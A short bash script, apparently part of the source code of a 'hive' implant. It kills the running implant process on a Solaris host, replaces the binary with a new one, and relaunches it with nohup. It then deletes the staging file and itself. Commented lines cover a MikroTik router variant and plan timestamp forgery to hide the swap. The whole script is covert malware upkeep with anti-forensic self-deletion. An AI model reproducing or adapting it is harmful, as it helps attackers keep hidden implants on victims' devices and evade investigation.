#!/bin/bash
fileToDelete=$0

#Most logic required to replace and restart hive...

#  Note that we still need to implement the touch
#      Would be best to used the oldImplants time to touch newhive and
#      then use newhive's time to touch the newImplant file just before 
#      it is ran. 

#/rw/pckg/busybox killall hived-mikrotik-mipsbe-PATCHED
#/rw/pckg/busybox sleep 5
#mv newhive hived-mikrotik-mipsbe-PATCHED
#/rw/pckg/busybox sleep 5
#/rw/pckg/hived-mikrotik-mipsbe-PATCHED &

kill -9 `ps -ef | grep /export/home/[h]ived-solaris-sparc-PATCHED | grep -v grep | awk '{print $2}' ` 2>/dev/null
sleep 5
cp newhive hived-solaris-sparc-PATCHED
sleep 5
/usr/bin/nohup /export/home/hived-solaris-sparc-PATCHED &


#Remove newImplant file if it exists
rm -f /export/home/newhive 2>/dev/null 

rm -f $fileToDelete 2>/dev/null

